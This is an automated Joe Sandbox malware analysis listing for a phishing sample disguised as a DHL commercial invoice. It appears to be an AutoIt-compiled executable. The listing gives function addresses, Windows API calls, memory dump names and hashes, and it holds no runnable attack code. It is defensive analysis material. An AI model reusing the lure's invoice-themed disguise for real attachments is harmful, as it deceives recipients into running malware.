Part of subcall function 00401B4A: RegisterWindowMessageW.USER32(00000004,?,004012C4), ref: 00401BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040136A
OleInitialize.OLE32 ref: 00401388
CloseHandle.KERNEL32(00000000,00000000), ref: 004424AB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 30ade1e4b09dc6811e8ad8d2e13ce549de5376989f3b114438c8304ec167dde2
Instruction ID: 9218da4dd06aac80b2a3e4a20ff6e351540835b2827a8609de6440eb1ad28d82
Opcode Fuzzy Hash: 30ade1e4b09dc6811e8ad8d2e13ce549de5376989f3b114438c8304ec167dde2
Instruction Fuzzy Hash: 67718CB4A02240BFC784EFBAB9656553BE1AB88344754823FE80AD73B2E7384440CF4D

Function 004386AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004385CC,?,004C8CC8,0000000C), ref: 00438704
GetLastError.KERNEL32(?,004385CC,?,004C8CC8,0000000C), ref: 0043870E
__dosmaperr.LIBCMT ref: 00438739

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 14c91f73b7e8728a63fd2ff290d3386d89c4791c173d7cbfc75140c6a9c44d3b
Instruction ID: 54c826ec21bc7476881363d740667dd6ea227f9d6439bed2f6130f9786f14060
Opcode Fuzzy Hash: 14c91f73b7e8728a63fd2ff290d3386d89c4791c173d7cbfc75140c6a9c44d3b
Instruction Fuzzy Hash: 2A016B3260532016C6306334684677FA7694B9A778F38212FFC158B2D2DEAC8C81819C

Function 00472FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00472CD4,?,?,?,00000004,00000001), ref: 00472FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00472CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00473006
CloseHandle.KERNEL32(00000000,?,00472CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0047300D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 61917bd8496eee63fc267641ece8c84c082ee2940d027a62818832f7e3283921
Instruction ID: bc47269281fe9c30abdd4185b743fa9049693d95c354176ebc6a714f52f52b51
Opcode Fuzzy Hash: 61917bd8496eee63fc267641ece8c84c082ee2940d027a62818832f7e3283921
Instruction Fuzzy Hash: 0CE0863228021077D2301755BC4EFCB3A1CD786B71F104231FB19751D046A1190156AC

Function 00411310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004117F6

Strings

CALL, xrefs: 004117C6

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 1affb3dc47cf8fcd8dd484f0ab16d980d602390e5289a21bfec852461bce8a66
Instruction ID: 3a11a2c25e4a2b88b0940f904a25a0b9512868a59723bf3808024743d2e72fba
Opcode Fuzzy Hash: 1affb3dc47cf8fcd8dd484f0ab16d980d602390e5289a21bfec852461bce8a66
Instruction Fuzzy Hash: 9F229E706083019FC714DF15C490B6ABBF1BF85318F54892EF9968B3A2D779E885CB4A

Function 00476EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00476F6B

Part of subcall function 00404ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00476F5A, 00476F63

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: d757e98c1ca47d1b311f9c5041ed6f63cecb1158dfb6fe462279872edc3d264f
Instruction ID: 2b3f6741ab254729609263314b0fb7ad29dfcbe08dda2b9ee62f383131657d55
Opcode Fuzzy Hash: d757e98c1ca47d1b311f9c5041ed6f63cecb1158dfb6fe462279872edc3d264f
Instruction Fuzzy Hash: 06B1C8711082018FC714EF21C4919AFB7E5AF94308F45896EF89A97292DB38ED45CB9A

Function 00472557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00472587

Strings

EA06, xrefs: 004725B9

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: b53a24788e0fca4d6a07d8c80dc017e7470f9ee81b147f37593f5b8dbfcca682
Instruction ID: 1af5cae62b57901f487c7aa7d84b06404c4e6a966851124e5b9032ab90b9ba8e
Opcode Fuzzy Hash: b53a24788e0fca4d6a07d8c80dc017e7470f9ee81b147f37593f5b8dbfcca682
Instruction Fuzzy Hash: BA01F5729042287EDF18C7A9C816FEEBBF89F05305F00855FE192D2181E4B8E6088B64

Function 00403837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00403908

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 2694399698a6a97cb1bb546aebbdb0236bb7d9e1e82d00f7ead3e3590af0668f
Instruction ID: c15524de2a5edb241e5e4553c1a1057d1caf3c26ebd884dd8025bc14ccf80c9a
Opcode Fuzzy Hash: 2694399698a6a97cb1bb546aebbdb0236bb7d9e1e82d00f7ead3e3590af0668f
Instruction Fuzzy Hash: 1231C0B16047009FE320EF25D884797BBE8FB49709F00097FF99993290E775AA04CB5A

Function 019A1070 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 019A08E0: GetFileAttributesW.KERNELBASE(?), ref: 019A08EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 019A119F

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 5468e61e16de3a673499f63b67702db3409f66859a3166e7a959fa09b0ce8f4e
Instruction ID: c945e30ecd3895075dde1ebff8a39db21831d7c20a7c0def33f73922a0a6d654
Opcode Fuzzy Hash: 5468e61e16de3a673499f63b67702db3409f66859a3166e7a959fa09b0ce8f4e
Instruction Fuzzy Hash: 15518731A1020997EF14EFA4C954BEF7779EF58300F4045A9AA0DE7180EB75AB48CBA5

Function 00404ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00404EDD,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404E9C
Part of subcall function 00404E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404EAE
Part of subcall function 00404E90: FreeLibrary.KERNEL32(00000000,?,?,00404EDD,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404EFD

Part of subcall function 00404E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00443CDE,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404E62
Part of subcall function 00404E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404E74
Part of subcall function 00404E59: FreeLibrary.KERNEL32(00000000,?,?,00443CDE,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404E87

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: df20ae1e2716574bc1ca16d43483c0bc72628f8644b50fcbafa24c3d7384d030
Instruction ID: 9ddf9b0cf780d360c7e3f13162c1e43e97f16f0071030faff16c96ba16bc1859
Opcode Fuzzy Hash: df20ae1e2716574bc1ca16d43483c0bc72628f8644b50fcbafa24c3d7384d030
Instruction Fuzzy Hash: 1C112B72600205AADF10BF61DC42FAD77A49F80B15F10843FF642B61C1DEB89A059B58

Function 00438402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00438440

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ba8e134145e456105cead83cb153e0ce4948047da74c30acfbb64a8666414d61
Instruction ID: c3d8c7451d02fb9a076c18d9f90c3490fe791393346c0fda1f754169ca2211fe
Opcode Fuzzy Hash: ba8e134145e456105cead83cb153e0ce4948047da74c30acfbb64a8666414d61
Instruction Fuzzy Hash: 1B111C7590420AAFCF15DF58E94199BBBF5EF48314F14405AF808AB311E731DA11CB69

Function 00435000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00434C7D: RtlAllocateHeap.NTDLL(00000008,00401129,00000000,?,00432E29,00000001,00000364,?,?,?,0042F2DE,00433863,004D1444,?,0041FDF5,?), ref: 00434CBE

_free.LIBCMT ref: 0043506C

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 40aca46b703f2a43d6ecd2bbb0191be73fcfb51e44ff699261211fb973284b72
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: C10149B22047046BE3358F65D881A9AFBECFB8D370F25051EE184932C0EA75A805C7B8

Function 0042E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 1b4d6980a134d3e695ccbb1325e41b93a735e5c084c39a27a01622c5a8040a66
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 69F0F932711A30D6C6313A67AD05B5737989F62379F90071FF420922D2DB7C940285AD

Function 00434C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00401129,00000000,?,00432E29,00000001,00000364,?,?,?,0042F2DE,00433863,004D1444,?,0041FDF5,?), ref: 00434CBE

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5dabace6e67e0c06eac08d1222056b7d28e40e59750a7cb9768306d93d03743a
Instruction ID: d0801a08dd9eb2a549b4597277b611120f47e6b3ca7546de7ffd0a5e0a640668
Opcode Fuzzy Hash: 5dabace6e67e0c06eac08d1222056b7d28e40e59750a7cb9768306d93d03743a
Instruction Fuzzy Hash: 0AF0B43160223466DB215F62AD05BDB3788EFC57A0F177127BC15A72D1CA78FC0246AC

Function 00433820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,004D1444,?,0041FDF5,?,?,0040A976,00000010,004D1440,004013FC,?,004013C6,?,00401129), ref: 00433852

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9ba315fed18f09302ef8e98e24a00faf4cf5fb8d5a829067cfb3019aa5550736
Instruction ID: ea24614a18cfc8e0f5f1028d92bedc2ebf2131cea25f977605ef6495a1446606
Opcode Fuzzy Hash: 9ba315fed18f09302ef8e98e24a00faf4cf5fb8d5a829067cfb3019aa5550736
Instruction Fuzzy Hash: 72E0E531201234A6F6253E67AC01B9B37C8AF867B2F551037BC04926E0CB19DD0285ED

Function 00404F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404F6D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 023d803ffabb37db933a504339b132b1f4dabf63742a847e248392511a3809e1
Instruction ID: 7da1d96633d8ef5f9dbaddc38a03c9d61b46ecb57ef492bc0d42c6129748a140
Opcode Fuzzy Hash: 023d803ffabb37db933a504339b132b1f4dabf63742a847e248392511a3809e1
Instruction Fuzzy Hash: B4F030B1105752CFDB349F65E490822B7E4EF54319310897FE3DA92651C7359844DF18

Function 00402DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00402DC4

Part of subcall function 00406B57: _wcslen.LIBCMT ref: 00406B6A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 874b14e6ba778e3cb0b3d62cc4bbe357d5b9dace6e30cfc053132212e855ca66
Instruction ID: 03946bef7ad949c63c0565e81ec2c357cfa131606da016b7fbbec6739e0ec598
Opcode Fuzzy Hash: 874b14e6ba778e3cb0b3d62cc4bbe357d5b9dace6e30cfc053132212e855ca66
Instruction Fuzzy Hash: 6BE0CD72A001245BC710E7599C05FDA77EDDFC8794F0500B6FD09E7258D974AD848554

Function 00472693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 004726B5

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 54364b63386348eb026ccc7db4f5a764ab35cd8640585fbcd629c959ea5ef37d
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 09E01AB0609B005BDF396A28A9517F777E89F49300F00486FF69E82352E5A268458A4D

Function 00402B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00403837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00403908

Part of subcall function 0040D730: GetInputState.USER32 ref: 0040D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00402B6B

Part of subcall function 004030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0040314E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 51b375163e44bbd97b33e92b415b87afdda3ca2b2e9e7a97be434286f3dee8a5
Instruction ID: f0a8ae49cca8efb5320a79a97159484f4c2eb2d8bf7c45a8a970065e2a960d7c
Opcode Fuzzy Hash: 51b375163e44bbd97b33e92b415b87afdda3ca2b2e9e7a97be434286f3dee8a5
Instruction Fuzzy Hash: 17E0262230020417CA04BF72985257EBB5D8BD135AF00553FF542632E3CF3C4949421D

Function 019A08E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 019A08EB

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 62df527c0b34ce5a6f597a12fd2e410c9877ad7f42c3ee9cad7686cd404006e5
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
